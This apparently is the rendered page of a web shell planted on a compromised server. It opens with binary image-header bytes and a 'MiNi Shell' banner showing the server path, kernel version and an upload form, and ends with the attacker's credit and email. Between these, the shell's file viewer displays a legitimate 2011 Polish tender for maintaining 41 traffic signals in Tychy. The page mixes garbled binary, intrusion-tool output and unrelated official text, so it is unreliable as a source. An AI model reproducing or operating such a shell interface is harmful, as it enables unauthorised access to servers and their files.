JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111202/407996-N-2011.html

<p class="kh_header"><b>Tychy: Utrzymanie i konserwacja 41 szt. sygnalizacji świetlnych na drogach i ulicach na terenie miasta Tychy w 2012 roku</b><br>
<b>Numer ogłoszenia: 407996 - 2011; data zamieszczenia: 02.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Ulic i Mostów , ul. Budowlanych 59, 43-100 Tychy, woj. śląskie, tel. 032 227-70-06, 3271491, faks 032 2277008.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzuim.tychy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie i konserwacja 41 szt. sygnalizacji świetlnych na drogach i ulicach na terenie miasta Tychy w 2012 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przeprowadzanie codziennego, w tym również w soboty, niedziele i święta objazdu i kontroli sygnalizacji w godzinach od 4:00 do 8:00, 
2. Sprawdzanie, poprawności działania sygnalizacji i świecenia źródeł światła,
3. Sprawdzanie skuteczności działania przycisków, pętli, detektorów oraz urządzeń realizujących program sygnalizacji,
4. Sprawdzanie i pomiar przekaźników sygnalizacyjnych, obwodów sygnalizacyjnych,
5. Sprawdzanie i pomiar pętli detekcyjnych,
6. Sprawdzanie układu zgłoszenia pieszego, kontrola napięć, wykrywanie korozji, zatrzymanie cyklu,
7. Regulacja długości poszczególnych faz,
8. Utrzymanie sygnalizatorów dźwiękowych,
9. Konserwacja sygnalizatorów (mycie soczewek oraz utrzymanie oznakowania soczewek sygnalizatorów, odblasków, ekranów, słupów, wysięgników, szafek) nie rzadziej niż raz w miesiącu
10. Bieżące czyszczenie masztów, wysięgników i szaf sterowników z naklejanych ogłoszeń.
11. Bieżące sprawdzanie stanu antykorozyjnej powłoki ochronnej wszystkich elementów metalowych, a w przypadku złego stanu, malowanie ich,
12. Bieżąca kontrola, zakup i wymiana żarówek, żarników i wkładów LED,
13. Bieżąca kontrola i zakup oraz wymiana drobnych elementów takich jak: bezpieczniki, uszkodzone soczewki, daszki, uszczelki drzwiczek i soczewek  itp.,
14. Kontrola zespołu zasilania elektrycznego Systemu Zasilania Rezerwowego,
15. Kontrola i przegląd głowic kablowych (sprawdzanie podłączeń kablowych, dokręcanie nakrętek na połączeniach, sprawdzanie szczelności głowic)
16. Zmianę czasów przełączeń programów, aktualizowanych wg wskazań Zamawiającego (przede wszystkim w związku ze zmianą czasu na letni i zimowy).
17. Wprowadzanie zmian (do 20 w roku) programów sygnalizacji według wskazań Zamawiającego (w tym wykonanie oprogramowania i uruchomienie sterownika)
18. Raz w roku wymiana baterii podtrzymujących w modemach GSM
19. Jednokrotne malowanie, w terminie do 31 sierpnia, masztów, wysięgników  i  szaf sterowniczych po wcześniejszym wskazaniu przez upoważnionego pracownika MZUiM. Wykonawca zgłasza pisemnie do odbioru wykonanie malowania wraz z wykazem pomalowanych w/w elementów. Do malowania masztów, wysięgników i szaf sterowniczych  należy zastosować  farbę  chlorokauczukową szarą RAL 7042  oraz farbę chlorokauczukową czarną RAL 9005 do fundamentów wysięgników i latarń oraz metalowych elementów  studzienek po uprzednim zabezpieczeniu farbą podkładową (dla elementów ocynkowanych należy stosować farby przeznaczone do konserwacji tego typu powłok).
20. Jednokrotne w roku badanie uziemienia ochronnego. Wyniki badań należy przekazać w postaci raportów dla poszczególnych sygnalizacji oraz w postaci zbiorczego zestawienia.
21. Dokonywanie odczytów liczników energii elektrycznej co dwa miesiące,
22. Przeprowadzanie raz w miesiącu przeglądów sygnalizacji przy udziale upoważnionego  przedstawiciela zamawiającego i sporządzanie protokołów z przeglądu (dla losowo wybranych sygnalizacji),
23. Prowadzenie dziennika sygnalizacji zgodnie z zasadami określonymi w Instrukcji o drogowej sygnalizacji świetlnej i przekazywanie go raz w miesiącu do wglądu przedstawicielowi zamawiającego,
24. Oznakowanie miejsca prac zgodnie z przepisami o ruchu drogowym i zarządzaniu ruchem na drogach, a także w zgodności z rozporządzeniem Ministra Infrastruktury z 3.07.2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunkach ich umieszczania na drogach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Przeprowadzanie codziennego, w tym również w soboty, niedziele i święta objazdu i kontroli sygnalizacji w godzinach od 4:00 do 8:00, 
2. Sprawdzanie, poprawności działania sygnalizacji i świecenia źródeł światła,
3. Sprawdzanie skuteczności działania przycisków, pętli, detektorów oraz urządzeń realizujących program sygnalizacji,
4. Sprawdzanie i pomiar przekaźników sygnalizacyjnych, obwodów sygnalizacyjnych,
5. Sprawdzanie i pomiar pętli detekcyjnych,
6. Sprawdzanie układu zgłoszenia pieszego, kontrola napięć, wykrywanie korozji, zatrzymanie cyklu,
7. Regulacja długości poszczególnych faz,
8. Utrzymanie sygnalizatorów dźwiękowych,
9. Konserwacja sygnalizatorów (mycie soczewek oraz utrzymanie oznakowania soczewek sygnalizatorów, odblasków, ekranów, słupów, wysięgników, szafek) nie rzadziej niż raz w miesiącu
10. Bieżące czyszczenie masztów, wysięgników i szaf sterowników z naklejanych ogłoszeń.
11. Bieżące sprawdzanie stanu antykorozyjnej powłoki ochronnej wszystkich elementów metalowych, a w przypadku złego stanu, malowanie ich,
12. Bieżąca kontrola, zakup i wymiana żarówek, żarników i wkładów LED,
13. Bieżąca kontrola i zakup oraz wymiana drobnych elementów takich jak: bezpieczniki, uszkodzone soczewki, daszki, uszczelki drzwiczek i soczewek  itp.,
14. Kontrola zespołu zasilania elektrycznego Systemu Zasilania Rezerwowego,
15. Kontrola i przegląd głowic kablowych (sprawdzanie podłączeń kablowych, dokręcanie nakrętek na połączeniach, sprawdzanie szczelności głowic)
16. Zmianę czasów przełączeń programów, aktualizowanych wg wskazań Zamawiającego (przede wszystkim w związku ze zmianą czasu na letni i zimowy).
17. Wprowadzanie zmian (do 20 w roku) programów sygnalizacji według wskazań Zamawiającego (w tym wykonanie oprogramowania i uruchomienie sterownika)
18. Raz w roku wymiana baterii podtrzymujących w modemach GSM
19. Jednokrotne malowanie, w terminie do 31 sierpnia, masztów, wysięgników  i  szaf sterowniczych po wcześniejszym wskazaniu przez upoważnionego pracownika MZUiM. Wykonawca zgłasza pisemnie do odbioru wykonanie malowania wraz z wykazem pomalowanych w/w elementów. Do malowania masztów, wysięgników i szaf sterowniczych  należy zastosować  farbę  chlorokauczukową szarą RAL 7042  oraz farbę chlorokauczukową czarną RAL 9005 do fundamentów wysięgników i latarń oraz metalowych elementów  studzienek po uprzednim zabezpieczeniu farbą podkładową (dla elementów ocynkowanych należy stosować farby przeznaczone do konserwacji tego typu powłok).
20. Jednokrotne w roku badanie uziemienia ochronnego. Wyniki badań należy przekazać w postaci raportów dla poszczególnych sygnalizacji oraz w postaci zbiorczego zestawienia.
21. Dokonywanie odczytów liczników energii elektrycznej co dwa miesiące,
22. Przeprowadzanie raz w miesiącu przeglądów sygnalizacji przy udziale upoważnionego  przedstawiciela zamawiającego i sporządzanie protokołów z przeglądu (dla losowo wybranych sygnalizacji),
23. Prowadzenie dziennika sygnalizacji zgodnie z zasadami określonymi w Instrukcji o drogowej sygnalizacji świetlnej i przekazywanie go raz w miesiącu do wglądu przedstawicielowi zamawiającego,
24. Oznakowanie miejsca prac zgodnie z przepisami o ruchu drogowym i zarządzaniu ruchem na drogach, a także w zgodności z rozporządzeniem Ministra Infrastruktury z 3.07.2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunkach ich umieszczania na drogach.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.23.22.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli zostanie wykazane, wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi w zakresie niezbędnym do wykazania spełniania warunku doświadczenia, tzn. usługi polegającej na konserwacji i utrzymaniu sygnalizacji świetlnych na drogach publicznych, w tym co najmniej jednej sygnalizacji na drodze krajowej - w okresie 1 roku
W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek musi spełnić co najmniej jeden podmiot.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli zostanie wykazane, dysponowanie niezbędnym do wykonania zamówienia potencjałem technicznym jn.:
- pojazdy przystosowane do patrolowania - min. 2 szt.
- samochód z podnośnikiem koszowym - min. 1 szt.
- lokalizator z homologacją do lokalizacji uszkodzeń kabla - min. 1 szt.
W przypadku składania oferty przez podmioty występujące wspólnie o udzielenie zamówienia ww. warunek podmioty te mogą spełniać łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli zostanie wykazane, dysponowanie osobami zdolnymi do wykonania zamówienia tj.:
- co najmniej 1 osobą kadry technicznej posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji kierownika budowy w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych
Osoba odpowiedzialna za realizację ww. funkcji, zgodnie z obowiązującymi przepisami winna posiadać stosowne uprawnienia zawodowe oraz zaświadczenie o przynależności do właściwej Okręgowej Izby.
- co najmniej 2 osobami posiadającymi zaświadczenie o ukończeniu szkolenia z zakresu wykonywania niektórych czynności związanych z kierowaniem ruchem drogowym wydane przez Wojewódzka Komendę Policji lub Wojewódzki Ośrodek Ruchu Drogowego.
- co najmniej 1 osobą posiadającą świadectwo kwalifikacji uprawniające do zajmowania się eksploatacją instalacji sieci trakcyjnej do 600V (prace przy sieci trolejbusowej) na stanowisku eksploatacji - grupa E,
- co najmniej 1 osobą posiadającą świadectwo kwalifikacji uprawniające do zajmowania się eksploatacją instalacji sieci trakcyjnej do 600V (prace przy sieci trolejbusowej) na stanowisku dozoru - grupa D,
- co najmniej 1 osobą posiadająca przeszkolenie w zakresie obsługi sterowników ASR
- co najmniej 2 osoby posiadające uprawnienia SEP do 1 KV
W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek podmioty te mogą spełniać łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) druk OFERTA WYKONAWCY
b) druk OŚWIADCZENIE WYKONAWCY
c) druk OŚWIADCZENIE
d) w przypadku wykonawców ubiegających się wspólnie o zamówienie, pełnomocnictwo dla jednego z wykonawców lub osoby trzeciej, podpisane przez wszystkich wykonawców wspólnie ubiegających się o zamówienie
e) jeżeli wykonawcę reprezentuje pełnomocnik należy załączyć stosowne pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów dołączonych do oferty
f) wzór umowy z parafowanymi stronami oraz podpisaną ostatnią stroną umowy
g) oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pzp</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzuim.tychy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Ulic i Mostów
43-100 Tychy
ul. Budowlanych 59
pokój nr 201.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2011 godzina 09:00, miejsce: Miejski Zarząd Ulic i Mostów
43-100 Tychy
ul. Budowlanych 59
pokój nr 201.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wymagany termin realizacji zamówienia: 01.01.2012 r. - 31.12.2012 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com